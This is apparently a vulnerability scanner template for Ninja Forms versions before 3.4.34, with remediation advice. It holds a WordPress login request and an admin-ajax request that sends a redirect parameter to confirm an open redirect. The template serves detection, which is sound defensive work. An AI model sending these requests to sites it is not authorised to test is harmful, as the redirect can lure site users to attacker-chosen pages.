id: ninjaform-open-redirect
info:
  name: Ninja Forms < 3.4.34 - Administrator Open Redirect
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Ninja Forms has URL redirection vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an open source application plug-in for WordPress.

    There is an input validation error vulnerability in the client_id of WordPress Ninja Forms 3.4.34 and earlier versions, causing users to be redirected to a URL address that it did not validate before.
  severity: low
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. The code fixes the jump address and does not allow users to control variables.
    2. The redirect target address adopts a whitelist mapping mechanism and only redirects to legal URLs.
    3. Verify the target address of the jump reasonably and fully, and inform the user of the risk of jump if it is not your own address.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1 == 302
    - status_code_2 == 302
    - 'contains(all_headers_2, ''Location: https://example.com?client_id=1'')'
  raw:
  - |
    POST /wp-login.php HTTP/1.1
    Host: {{Hostname}}
    Origin: {{RootURL}}
    Content-Type: application/x-www-form-urlencoded
    Cookie: wordpress_test_cookie=WP%20Cookie%20check

    log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
  - |
    GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1
    Host: {{Hostname}}
  cookie-reuse: true
  req-condition: true
